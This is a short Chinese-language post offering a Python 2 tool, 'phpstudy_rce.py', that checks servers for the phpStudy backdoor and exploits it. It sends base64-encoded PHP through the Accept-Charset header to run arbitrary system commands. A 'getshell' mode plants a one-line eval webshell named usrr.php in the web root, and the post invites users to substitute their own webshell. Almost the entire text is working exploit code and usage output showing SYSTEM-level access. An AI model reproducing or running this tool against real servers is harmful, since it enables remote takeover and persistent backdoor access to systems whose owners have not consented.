phpstudy后门检测及利用工具【未通过】

phpstudy后门检测及利用工具，可检测漏洞，直接执行系统命令，一键getshell（默认一句话，可更改源码中的webshell未为自己的即可,webshell默认在网站根目录下）。直接python运行脚本会打印用法。

# -*- coding: utf-8 -*-
# @Author: caixukun
import requests
import base64
import re
import sys


from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

webshell = r'''

<?php @eval($_POST['cmd']); ?>

'''

if len(sys.argv)==3:
    url = sys.argv[1]
    s = sys.argv[2]
    if s =='getshell':
        s1 = "echo $_SERVER['DOCUMENT_ROOT'];"
        s2 = "echo 'fuck';"+s1+"echo 'fuck';"
        cmd = base64.b64encode(s2)
        sess = requests.Session()
        sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
        r = sess.get(url,verify=False,timeout=5)
        huixian = re.findall("fuck(.*?)fuck",r.content,re.S)
        for x in huixian:
            lujing = x
        
        s2 = "fwrite(fopen('"+lujing+"/usrr.php', 'w'),"+"'"+webshell+"');";
        s2 = "echo 'fuck';"+s2+"echo 'fuck';"
        cmd = base64.b64encode(s2.encode('utf-8'))
        sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
        r = sess.get(url,verify=False,timeout=5)
        print "-------------------getshell-------------------"
        print "webshell:"+url+"/usrr.php"
    else:
        s = base64.b64encode(s)
        s1 = "exec(base64_decode('"+s+"'));"
        sess = requests.Session()
        s2 = "echo 'fuck';"+s1+"echo 'fuck';"
        cmd = base64.b64encode(s2.encode('utf-8'))
        sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
    
        try:
            r = sess.get(url,verify=False,timeout=5)
            huixian = re.findall("fuck(.*?)fuck",r.content,re.S)
            for x in huixian:
                print x
        except Exception,e:
            print '连接超时，请检查你的ur地址'.decode('utf-8')

elif len(sys.argv)==2:
    url = sys.argv[1]
    sess = requests.Session()
    s = "echo 'fuck phpstudy';"
    cmd = base64.b64encode(s)
    sess.headers.update({'Accept-Encoding':'gzip,deflate','Accept-Charset':cmd,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'})
    
    try:
        r = sess.get(url,verify=False,timeout=5)
        if 'fuck phpstudy' in r.content:
            print '存在phpstydy后门!!!---Do it'.decode('utf-8')
        else:
            print "没有后门或者输入网站其它php文件".decode('utf-8')
    except Exception,e:
        print '连接超时，请检查你的ur地址'.decode('utf-8')

else:
    print "------------------------Author: caixukun-------------------------"
    print "phpstudy后门检测工具及利用工具终极版".decode('utf-8')
    print "------------------------check-----------------------------------"
    print "python phpstudy_rce.py http://127.0.0.1"
    print "存在phpstydy后门!!!---Do it".decode('utf-8')
    print "-------------------------exploit--------------------------------"
    print "python phpstudy_rce.py http://127.0.0.1 whoami"
    print "nt authority\system"
    print "-------------------------getshell--------------------------------"
    print "python phpstudy_rce.py http://127.0.0.1 getshell"
    print "webshell:http://127.0.0.1/usrr.php  支持自定义webshell，更改源码webshell为自己的即可".decode('utf-8')